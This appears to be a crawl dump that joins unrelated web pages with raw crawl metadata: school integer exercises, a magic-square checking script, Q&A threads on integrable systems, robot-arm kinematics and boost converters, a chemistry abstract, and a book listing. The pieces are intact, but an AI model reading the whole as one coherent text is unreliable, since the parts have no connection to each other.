81\n\n= – 399 + 240\n\n= – 159\n\nBy comparing LHS and RHS\n\nLHS > RHS\n\n-101 > -159\n\n∴ – 231 + 79 + 51 [>] -399 + 159 + 81\n\n10. A water tank has steps inside it. A monkey is sitting on the topmost step (i.e., the first step). The water level is at the ninth step.", null, "(i) He jumps 3 steps down and then jumps back 2 steps up. In how many jumps will he reach the water level?\n\nSolution:-\n\nLet us consider steps moved down are represented by positive integers and then, steps moved up are represented by negative integers.\n\nInitially monkey is sitting on the top most step i.e., first step\n\nIn 1st jump monkey will be at step = 1 + 3 = 4 steps\n\nIn 2nd jump monkey will be at step = 4 + (-2) = 4 – 2 = 2 steps\n\nIn 3rd jump monkey will be at step = 2 + 3 = 5 steps\n\nIn 4th jump monkey will be at step = 5 + (-2) = 5 – 2 = 3 steps\n\nIn 5th jump monkey will be at step = 3 + 3 = 6 steps\n\nIn 6th jump monkey will be at step = 6 + (-2) = 6 – 2 = 4 steps\n\nIn 7th jump monkey will be at step = 4 + 3 = 7 steps\n\nIn 8th jump monkey will be at step = 7 + (-2) = 7 – 2 = 5 steps\n\nIn 9th jump monkey will be at step = 5 + 3 = 8 steps\n\nIn 10th jump monkey will be at step = 8 + (-2) = 8 – 2 = 6 steps\n\nIn 11th jump monkey will be at step = 6 + 3 = 9 steps\n\n∴Monkey took 11 jumps (i.e., 9th step) to reach the water level\n\n(ii) After drinking water, he wants to go back. For this, he jumps 4 steps up and then jumps back 2 steps down in every move. 
In how many jumps will he reach back the top step?\n\nSolution:-\n\nLet us consider steps moved down are represented by positive integers and then, steps moved up are represented by negative integers.\n\nInitially monkey is sitting on the ninth step i.e., at the water level\n\nIn 1st jump monkey will be at step = 9 + (-4) = 9 – 4 = 5 steps\n\nIn 2nd jump monkey will be at step = 5 + 2 = 7 steps\n\nIn 3rd jump monkey will be at step = 7 + (-4) = 7 – 4 = 3 steps\n\nIn 4th jump monkey will be at step = 3 + 2 = 5 steps\n\nIn 5th jump monkey will be at step = 5 + (-4) = 5 – 4 = 1 step\n\n∴Monkey took 5 jumps to reach back the top step i.e., first step.\n\n(iii) If the number of steps moved down is represented by negative integers and the number of steps moved up by positive integers, represent his moves in part (i) and (ii) by completing the following; (a) – 3 + 2 – … = – 8 (b) 4 – 2 + … = 8. In (a) the sum (– 8) represents going down by eight steps. So, what will the sum 8 in (b) represent?\n\nSolution:-\n\nFrom the question, it is given that\n\nIf the number of steps moved down is represented by negative integers and the number of steps moved up by positive integers.\n\nMonkey moves in part (i)\n\n= – 3 + 2 – ……….. = – 8\n\nThen LHS = – 3 + 2 – 3 + 2 – 3 + 2 – 3 + 2 – 3 + 2 – 3\n\n= – 18 + 10\n\n= – 8\n\nRHS = -8\n\n∴Moves in part (i) represents monkey is going down 8 steps. Because negative integer.\n\nNow,\n\nMonkey moves in part (ii)\n\n= 4 – 2 + ……….. = 8\n\nThen LHS = 4 – 2 + 4 – 2 + 4\n\n= 12 – 4\n\n= 8\n\nRHS = 8\n\n∴Moves in part (ii) represents monkey is going up 8 steps. Because positive integer.\n\n### Access other exercises of NCERT Solutions For Class 7 Chapter 1 – Integers\n\nExercise 1.2 Solutions\n\nExercise 1.3 Solutions\n\nExercise 1.4 Solutions" ]
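The magic-square check and the a – (– b) = a + b verification above are mechanical enough to script. Below is a small illustrative sketch in Python (the language and the helper name `is_magic` are my own choices, not part of the NCERT material); the square entries are read off from the row and column sums worked out in the solution.

```python
# A small sketch (not part of the NCERT text) automating the magic-square check
# worked out above: a square is "magic" here if every row, column and both
# diagonals add up to the same total.

def is_magic(square):
    n = len(square)
    target = sum(square[0])                       # sum of the first row
    rows = all(sum(r) == target for r in square)
    cols = all(sum(square[i][j] for i in range(n)) == target for j in range(n))
    diag1 = sum(square[i][i] for i in range(n)) == target
    diag2 = sum(square[i][n - 1 - i] for i in range(n)) == target
    return rows and cols and diag1 and diag2

# Entries reconstructed from the row and column sums in the solution above.
square_i  = [[5, -1, -4], [-5, -2, 7], [0, 3, -3]]
square_ii = [[1, -10, 0], [-4, -3, -2], [-6, 4, -7]]

print(is_magic(square_i))    # False: the second diagonal sums to -6, not 0
print(is_magic(square_ii))   # True: every row, column and diagonal sums to -9

# The identity a - (-b) = a + b from question 8, checked for one of the pairs:
a, b = 21, 18
assert a - (-b) == a + b == 39
```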
[ null, "https://www.facebook.com/tr", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8873693,"math_prob":0.9993771,"size":12308,"snap":"2019-51-2020-05","text_gpt3_token_len":4257,"char_repetition_ratio":0.14011703,"word_repetition_ratio":0.2440666,"special_character_ratio":0.39852127,"punctuation_ratio":0.083704,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99987125,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-21T13:35:41Z\",\"WARC-Record-ID\":\"<urn:uuid:0ea4960f-d418-4bfa-8cfb-600a7c661476>\",\"Content-Length\":\"577831\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4ca9be51-76ff-42aa-8d03-666bfe7e0750>\",\"WARC-Concurrent-To\":\"<urn:uuid:34ea0b74-1ceb-47e7-be1e-a936229f1027>\",\"WARC-IP-Address\":\"52.77.80.199\",\"WARC-Target-URI\":\"https://byjus.com/ncert-solutions-for-class-7-maths-chapter-1-integers-ex-1-1/\",\"WARC-Payload-Digest\":\"sha1:KFI7VJY5YIKOF25TEOPU63P33JBUSTRP\",\"WARC-Block-Digest\":\"sha1:467WP5KHK65PLLLVO7NGBFHSBRGA3CSS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250604397.40_warc_CC-MAIN-20200121132900-20200121161900-00194.warc.gz\"}"}
https://mathoverflow.net/questions/14638/integrable-dynamical-system-relation-to-elliptic-curves
[ "# Integrable dynamical system - relation to elliptic curves\n\nFrom seminar on kdV equation I know that for integrable dynamical system its trajectory in phase space lays on tori. In wikipedia article You may read (http://en.wikipedia.org/wiki/Integrable_system):\n\nWhen a finite dimensional Hamiltonian system is completely integrable in the Liouville sense, and the energy level sets are compact, the flows are complete, and the leaves of the invariant foliation are tori. There then exist, as mentioned above, special sets of canonical coordinates on the phase space known as action-angle variables, such that the invariant tori are the joint level sets of the action variables. These thus provide a complete set of invariants of the Hamiltonian flow (constants of motion), and the angle variables are the natural periodic coordinates on the torus. The motion on the invariant tori, expressed in terms of these canonical coordinates, is linear in the angle variables.\n\nAs I also know that elliptic curve is in fact some kind of tori, then there natural question arises: Are tori for quasi-periodic motion in action-angle variables of some dynamical systems related in any way to algebraic structure like elliptic curve? Maybe some small dynamical systems and some elliptic curves are related in some way?\n\nThe most interesting in this matter is for me the size of space of elliptic functions: its quite small, every elliptic curve is rational function of Weiestrass function, and its derivative. Has this property any analogy in integrable dynamical systems theory?\n\nAs isomorphic elliptic curves shares some invariants, it is also interesting it they have any \"dynamical meaning\".\n\n• This is a great question, but I do want to point out that KdV is an infinite-dimensional integrable system, so I am not sure if the tori interpretation makes sense in this setting. In particular, KdV admits infinitely many conservation laws! Drazin and Johnson's \"Solitons: an introduction\" expands on this. I realize this has no real bearing on the question on hand. – Justin Curry Feb 8 '10 at 17:19\n• As You are right, kdV has infinitely many conservation laws, it also is quasi-periodic motion! So probably it may be case of \"infinite dimensional\" tori, which obviously is not related to elliptic curves. I am physicist by education ( but not working as scientist, I treat math as fun and hobby), so kdV is something which is example of integrable system with nontrivial equations of motion. – kakaz Feb 8 '10 at 19:00\n\nIf your system is algebraic, then you bet! More generally, you can get abelian varieties as the fibers for many interesting integrable systems. Google the following for more: algebraic complete integrable Hamiltonian system, Calogero-Moser System, Hitchin System.\n\nAs for elliptic curves, they'll only pop out in low dimensional cases, because otherwise, the fibers have to have larger dimension.\n\nAs for the latter, it depends what you might want. 
I've seen the definition of integrable given by \"can be solved by a sequence of quadratures\" and in this terminology, you can check that an algebraic system you're always working with the global section of the theta function on the abelian variety, which is the unique (up to scaling) global section of the theta divisor on the abelian variety, which for an elliptic curve, is just the Weierstrass function.\n\n• If in low dimensional case, elliptic curves appear in this question, is it true that curves which are isomorphic arises in equivalent algebraic dynamical systems? Is this kind of homomorphism between structures? – kakaz Feb 8 '10 at 16:31\n• Well, really what's going on is that you have families of elliptic curves. I'm not an expert, really, but isomorphic families give equivalent integrable systems, and I'm not sure about what notion of equivalent systems you're using (and even if I did, I'm not sure I'd be able to say much). – Charles Siegel Feb 8 '10 at 17:30\n• I thought on case when moving from one curve to another in equivalence class gives for example change of variables in equation of motion or something like that - some kind of reparametrization which is not quite formal but also has some kind of \"physical meaning\". – kakaz Feb 8 '10 at 19:03\n• Perhaps. I don't know enough to say for certain. – Charles Siegel Feb 8 '10 at 20:08\n\n\"The de-geometrisation of mathematical education and the divorce from physics sever these ties. For example, not only students but also modern algebro-geometers on the whole do not know about the Jacobi fact mentioned here: an elliptic integral of first kind expresses the time of motion along an elliptic phase curve in the corresponding Hamiltonian system. \"\n\nFrom A.I.Arnold, here: http://pauli.uni-muenster.de/~munsteg/arnold.html Definitely I should learn more in this area...." ]
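As a concrete illustration of the Jacobi fact quoted above (an elliptic integral of the first kind expresses the time of motion along an elliptic phase curve), here is a short Python sketch for the plane pendulum, the standard textbook example of such a Hamiltonian system. The period formula T = (4/omega0) K(m) with m = sin^2(theta0/2) is textbook material, not something taken from the thread, and the numerical values are purely illustrative.

```python
# Illustration (not from the thread) of the Jacobi/Arnold remark quoted above:
# for the plane pendulum, the time of motion along the (elliptic) phase curve
# is a complete elliptic integral of the first kind.
import numpy as np
from scipy.special import ellipk   # K(m), with scipy's parameter convention m = k**2

g, L = 9.81, 1.0                   # illustrative values
omega0 = np.sqrt(g / L)            # small-angle angular frequency
T_small = 2 * np.pi / omega0       # harmonic (small-angle) period

for theta0_deg in (10, 90, 170):
    m = np.sin(np.radians(theta0_deg) / 2) ** 2
    T_exact = 4 / omega0 * ellipk(m)              # exact period via K(m)
    print(theta0_deg, round(T_exact, 4), round(T_exact / T_small, 4))

# As theta0 -> 0 the ratio tends to 1; at large amplitudes the elliptic
# integral makes the period substantially longer than the harmonic estimate.
```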
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9073257,"math_prob":0.9293938,"size":1616,"snap":"2020-45-2020-50","text_gpt3_token_len":330,"char_repetition_ratio":0.12158809,"word_repetition_ratio":0.0,"special_character_ratio":0.18193069,"punctuation_ratio":0.10034602,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97538733,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-01T15:50:39Z\",\"WARC-Record-ID\":\"<urn:uuid:44245b00-1dfa-41e5-a6be-4bb06681db70>\",\"Content-Length\":\"140906\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:124b44c9-bd50-429b-ac3f-3fdb4d7f9d94>\",\"WARC-Concurrent-To\":\"<urn:uuid:d194bd9a-7bee-48a5-a47e-c6b38cd8b09f>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/14638/integrable-dynamical-system-relation-to-elliptic-curves\",\"WARC-Payload-Digest\":\"sha1:MMTBW6KO4TYM2CU4K7CJAT7P2ZEVD4CA\",\"WARC-Block-Digest\":\"sha1:P5WUSZNZBGWEXTC6HUANET4PO37YYAQS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141674594.59_warc_CC-MAIN-20201201135627-20201201165627-00566.warc.gz\"}"}
https://nl.mathworks.com/matlabcentral/cody/problems/44957-square-root-of-number/solutions/1914324
[ "Cody\n\n# Problem 44957. Square root of number\n\nSolution 1914324\n\nSubmitted on 28 Aug 2019 by Gergely Patay\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nx = 4; y_correct = 2; assert(isequal(your_fcn_name(x),y_correct))\n\nans = 2\n\n2   Pass\nx = 25; y_correct = 5; assert(isequal(your_fcn_name(x),y_correct))\n\nans = 5\n\n3   Pass\nx = 49; y_correct = 7; assert(isequal(your_fcn_name(x),y_correct))\n\nans = 7" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6420656,"math_prob":0.9927447,"size":493,"snap":"2019-43-2019-47","text_gpt3_token_len":161,"char_repetition_ratio":0.15337424,"word_repetition_ratio":0.0,"special_character_ratio":0.35091278,"punctuation_ratio":0.12903225,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9882614,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-20T14:19:01Z\",\"WARC-Record-ID\":\"<urn:uuid:1c3ed8eb-718c-439f-b17f-92646a069b4f>\",\"Content-Length\":\"72128\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:263151b2-d00f-4955-bb5a-3b7107df63b5>\",\"WARC-Concurrent-To\":\"<urn:uuid:6bd5f7da-4123-4217-941b-56c6136a5527>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://nl.mathworks.com/matlabcentral/cody/problems/44957-square-root-of-number/solutions/1914324\",\"WARC-Payload-Digest\":\"sha1:U3V2GRMR6CVEAL5KSUYCJUOFKSXWJUQB\",\"WARC-Block-Digest\":\"sha1:SVS2O2LZ7HHVLFCTDW4N3YAR6BFSLXNP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670559.66_warc_CC-MAIN-20191120134617-20191120162617-00482.warc.gz\"}"}
https://robotics.stackexchange.com/questions/23184/inverse-kinematics-for-2dof-robotic-arm-in-3d
[ "# Inverse kinematics for 2DOF robotic arm in 3D\n\ni am trying to find the inverse kinematics for quadrotor with 2Dof robotic arm, which has first joint rotation axis perpendicular with second joint. So, for the inverse kinematics i use two equations\n\ntheta 1 = atan2(z,y)\n\ntheta 2 = atan2(x, (sqrt(z^2 + y^2)-L1)), where x,y,z are end effector position\n\nIf I use these two solution in jacobean matrix for finding the joint velocities: thetadot = pinv(J)*(x,y,z)dot, at some point i have singular configuration. For finding the determinent of jacobean matrix, i consider the the determinant of the (J'*J) because my jacobean is a 3 * 2 matrix.\n\nSo my questions are\n\n1. are two equations for finding theta 1 and theta 2 correct?\n2. how can I avoid the singular configuration?\n3. when the jacobean matrix is zero, how can i find the joint velocities?\n• On Robotics we are fortunate enough to have MathJax support enabled, allowing you to easily create subscripts, superscripts, fractions, square roots, greek letters and more. This allows you to add both inline and block element mathematical expressions in robotics questions and answers. For a quick tutorial, take a look at How can I format mathematical expressions here, using MathJax?\n– Ben\nFeb 2, 2022 at 17:47\n• This paper treats the 2-D case, but perhaps it will give you some ideas. Most of the treatments I have seen are highly abstract, but this author (who is still at MIT after almost 50 years since he wrote the paper) gets \"down and dirty\". Feb 15, 2022 at 18:03" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8658455,"math_prob":0.96350706,"size":789,"snap":"2023-40-2023-50","text_gpt3_token_len":208,"char_repetition_ratio":0.12866242,"word_repetition_ratio":0.0,"special_character_ratio":0.24588086,"punctuation_ratio":0.11728395,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99762106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-11-28T18:41:16Z\",\"WARC-Record-ID\":\"<urn:uuid:ccd9add5-d831-4bf8-80e5-f37d6bb05d91>\",\"Content-Length\":\"163192\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:55510fae-ae4a-4549-8482-0df3eca063f0>\",\"WARC-Concurrent-To\":\"<urn:uuid:0df06d27-dec1-4875-b06b-5772acb9d4b8>\",\"WARC-IP-Address\":\"104.18.43.226\",\"WARC-Target-URI\":\"https://robotics.stackexchange.com/questions/23184/inverse-kinematics-for-2dof-robotic-arm-in-3d\",\"WARC-Payload-Digest\":\"sha1:BQSG6AP5DQOFSXNHPHORC2XP5ZAF7EWH\",\"WARC-Block-Digest\":\"sha1:VGGG3G7DBDBIOOFCGGKGJWM64RXQVZUJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679099942.90_warc_CC-MAIN-20231128183116-20231128213116-00028.warc.gz\"}"}
https://difusion.ulb.ac.be/vufind/Record/ULB-DIPOT:oai:dipot.ulb.ac.be:2013/236430/TOC
[ "Mon DI-fusion | À propos de DI-fusion | Contact |", null, "", null, "# Propriétés thermodynamiques des solutions associées\n\nArticle révisé par les pairs\n Résumé : Considering an associated solution, e. g. alcohol‐carbon tetrachloride, as a system of monomolecules and associated complexes in equilibrium with one another, it is shown that the thermodynamic properties, particularly activity coefficients, are completely determined by the chemical potentials of the monomolecules only. Using the principle of detailed balancing of elementary processes, it is shown that the following relation holds between the activity coefficients ƒA/ƒB = α where α is the fraction of molecules of the associated constituent which appear as monomolecules. This relation may be checked by comparing thermodynamic measurements of ƒA, and ƒB with values of a obtained from the spectroscopic study of the intensity of the OH monomolecular vibration band. Different statistical models are used for the calculation of the thermodynamic properties of the associated solutions. The results are compared and discussed. The influence of the size and shape of the associated complexes is studied. The calculated results are compared to the experimental ones for the systems (Formula Presented.) In these three cases, the relation ƒA/ƒB = α holds quite fairly. A direct proof is thus given that the deviations from ideality may be justified by the formation of complexes in these systems. In addition, the comparison of the observed activity coefficients and those calculated by the different statistical models used shows that, in concentrated solutions, an important part of the complexes must be formed by two or three dimensional molecular aggregates. A chain‐association alone is not sufficient to interpret the departures from ideality. Copyright © 1949 Wiley‐VCH Verlag GmbH & Co. KGaA, Weinheim" ]
[ null, "https://difusion.ulb.ac.be/vufind/images/fr.png", null, "https://difusion.ulb.ac.be/vufind/images/gb.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8702909,"math_prob":0.91892284,"size":2006,"snap":"2021-21-2021-25","text_gpt3_token_len":442,"char_repetition_ratio":0.11638362,"word_repetition_ratio":0.06849315,"special_character_ratio":0.19541375,"punctuation_ratio":0.11764706,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.952248,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-25T06:20:37Z\",\"WARC-Record-ID\":\"<urn:uuid:d67355af-4a64-4f43-b54c-3fda17b554e9>\",\"Content-Length\":\"71198\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ee7cb0aa-2c8b-4b76-95c1-e98969cb3b01>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a645564-6071-47d7-ae93-ac69c2ae7076>\",\"WARC-IP-Address\":\"164.15.1.79\",\"WARC-Target-URI\":\"https://difusion.ulb.ac.be/vufind/Record/ULB-DIPOT:oai:dipot.ulb.ac.be:2013/236430/TOC\",\"WARC-Payload-Digest\":\"sha1:3I7DH2QHBJIVXI55SVAM6CZEE45LLFIM\",\"WARC-Block-Digest\":\"sha1:GXYJSCXMJJUZMMHUSAXSON5TYIRO5IKS\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487622113.11_warc_CC-MAIN-20210625054501-20210625084501-00010.warc.gz\"}"}
https://answers.everydaycalculation.com/percent-of-what-number/70-55
[ "Solutions by everydaycalculation.com\n\n## 70 percent of what number is 55?\n\n55 is 70% of 78.57\n\n#### Steps to solve \"55 is 70 percent of what number?\"\n\n1. We have, 70% × x = 55\n2. or, 70/100 × x = 55\n3. Multiplying both sides by 100 and dividing both sides by 70,\nwe have x = 55 × 100/70\n4. x = 78.57\n\nIf you are using a calculator, simply enter 55×100÷70, which will give you the answer.\n\nMathStep (Works offline)", null, "Download our mobile app and learn how to work with percentages in your own time:" ]
[ null, "https://answers.everydaycalculation.com/mathstep-app-icon.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9274143,"math_prob":0.99901706,"size":568,"snap":"2022-27-2022-33","text_gpt3_token_len":167,"char_repetition_ratio":0.26950353,"word_repetition_ratio":0.23300971,"special_character_ratio":0.33978873,"punctuation_ratio":0.067226894,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99151826,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-11T00:13:02Z\",\"WARC-Record-ID\":\"<urn:uuid:a9aed4d2-c833-4b28-9d22-c13e4558335e>\",\"Content-Length\":\"6056\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5f94bafb-9b52-42ad-86af-b34c4b0d3f86>\",\"WARC-Concurrent-To\":\"<urn:uuid:ceebb9d2-1ec0-4c98-919d-ca3a2b5ce36e>\",\"WARC-IP-Address\":\"96.126.107.130\",\"WARC-Target-URI\":\"https://answers.everydaycalculation.com/percent-of-what-number/70-55\",\"WARC-Payload-Digest\":\"sha1:ZXSJXM5FGOPNRICE6S74VPCEDGIE2S4K\",\"WARC-Block-Digest\":\"sha1:HZC4JUTXT3UXVU4CR45Z35W7FRWS7DNA\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882571222.74_warc_CC-MAIN-20220810222056-20220811012056-00742.warc.gz\"}"}
https://www.firstworldpublications.com/product/rapidsol-statics-vector-calculus-g-n-d-u/
[ "Sale!\n\n# RAPIDSOL STATICS & VECTOR CALCULUS (G.N.D.U)\n\n450.00 360.00\n\nYou Save: 20%\n\nThe present book provides a comprehensive treatment of the concepts and topics by giving a vast variety of examples fully solved. The entire subject matter has been arranged in a systematic, graded, simple, lucid and exhaustive manner. Each chapter begins with some definitions followed by theorems with complete proofs and solved problems. A large number of notes and remarks have been added for a better understanding of the subject.\n\n## Description\n\nComposition and resolution of forces (Parallelogram law, polygon law, Lami’s Theorem, (l – m) theorem). Resultant of a number of coplanar forces, parallel forces.\n\nMoments : Varignon’s theorem of moments, Couples Resultant of two Coplanar Couples, Equilibrium of two Coplanar Couples, Resultant of a force and a couple. Equilibrium of coplanar forces. Friction, Laws of friction, Equilibrium of a particle on a rough plane. Centre of Gravity : Centre of gravity of a rod, Triangular lamina solid hemisphere, hollow hemisphere, solid cone and hollow cone.\n\nVector differentiation, Gradient, divergence and curl operators, line integrals, Vector identity, Vector integration, Theorems of Gauss, Green, Stokes and problems based on these.\n\n## Reviews\n\nThere are no reviews yet." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8082769,"math_prob":0.80940044,"size":779,"snap":"2021-43-2021-49","text_gpt3_token_len":177,"char_repetition_ratio":0.117419355,"word_repetition_ratio":0.0,"special_character_ratio":0.19383825,"punctuation_ratio":0.20833333,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9725861,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-23T08:44:42Z\",\"WARC-Record-ID\":\"<urn:uuid:e39feb5c-1a24-4ede-ac9c-cb0f5621c595>\",\"Content-Length\":\"72404\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4b6bb3e5-654b-46d1-ad9b-13c8ff2fe7e6>\",\"WARC-Concurrent-To\":\"<urn:uuid:e0b74668-d166-4f0c-92ad-3898bb2f40a5>\",\"WARC-IP-Address\":\"103.159.84.93\",\"WARC-Target-URI\":\"https://www.firstworldpublications.com/product/rapidsol-statics-vector-calculus-g-n-d-u/\",\"WARC-Payload-Digest\":\"sha1:OFLCHFXKICMAHGB3NRMC5RFTHWPGFPF7\",\"WARC-Block-Digest\":\"sha1:GFXRJZ6VJIFXT5IM3Y6JPOZPUXOSARA6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585653.49_warc_CC-MAIN-20211023064718-20211023094718-00150.warc.gz\"}"}
https://electronics.stackexchange.com/questions/220254/boost-converter-with-input-referenced-output
[ "# Boost converter with input-referenced output\n\nI'm building my first switching DC/DC converter as part of a larger circuit. I need to convert a input voltage range to an overlapping output voltage (e.g. 3-5V in, 4V out). This would typically be done with a buck-boost or SEPIC converter. I thought of a way to use a simple boost converter IC instead. If it works, it allows me to go monolithic, while an equivalent buck-boost would require a controller + MOSFETs considering the ICs that manufacturers offer (high currents involved).\n\nBecause I don't need the output to be referenced to ground, I was planning to reference the load to the input voltage and change the switching IC feedback network to subtract the input voltage from the output.\n\nFor example, let's take a 4V output. Load is connected between input and output.\n\n• Input = 3V, the converter generates 7V (from ground), potential across load is 4V.\n• Input = 5V, the converter generates 9V (from ground), potential across load is 4V.\n\nIt seems to me like it should work and that I can calculate the inductor/switch current based on the actual voltage across the load. I searched a lot, but couldn't come up with much. The best I could find is the \"Negative-to-Positive Buck-Boost Converter\" circuit from page 24 of LT's AN19, which looks very similiar to what I'm talking about (with input voltage as ground and ground as negative voltage).\n\nCan this be done? If yes, can inductor and switch currents be calculated on the voltage across the load instead of the full ground-referenced one? Seems logical since the inductor is in series with the load, but if it's not true then I don't get any benefit out of this and I'll have to go with a controller.\n\n• One way is to use the calculation in the flyback section of the same app note you linked (start from page 30), just set the turn ratio N=1. Skip the snubber related stuff. As you already mentioned, you have to fix up the feedback to account for the offset. Mar 1, 2016 at 23:52", null, "" ]
[ null, "https://i.stack.imgur.com/1AoOT.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9385268,"math_prob":0.68110555,"size":1662,"snap":"2022-27-2022-33","text_gpt3_token_len":387,"char_repetition_ratio":0.12665862,"word_repetition_ratio":0.020833334,"special_character_ratio":0.22322503,"punctuation_ratio":0.094512194,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97506857,"pos_list":[0,1,2],"im_url_duplicate_count":[null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T06:36:59Z\",\"WARC-Record-ID\":\"<urn:uuid:b8f8ceae-8d36-40d0-a879-6a483e0e3739>\",\"Content-Length\":\"227223\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b03bc60b-b7c3-4816-98e0-6a83857a2f7d>\",\"WARC-Concurrent-To\":\"<urn:uuid:30882ea6-3eba-4c3f-8806-1e5ea3947f28>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://electronics.stackexchange.com/questions/220254/boost-converter-with-input-referenced-output\",\"WARC-Payload-Digest\":\"sha1:QJYWG26X3X2IT3B3NJGPUFJRMRYQQE6J\",\"WARC-Block-Digest\":\"sha1:HIVXEOEN2UWWMCAHGBCI6THAC265UO4H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103328647.18_warc_CC-MAIN-20220627043200-20220627073200-00566.warc.gz\"}"}
https://www.biostars.org/p/456632/
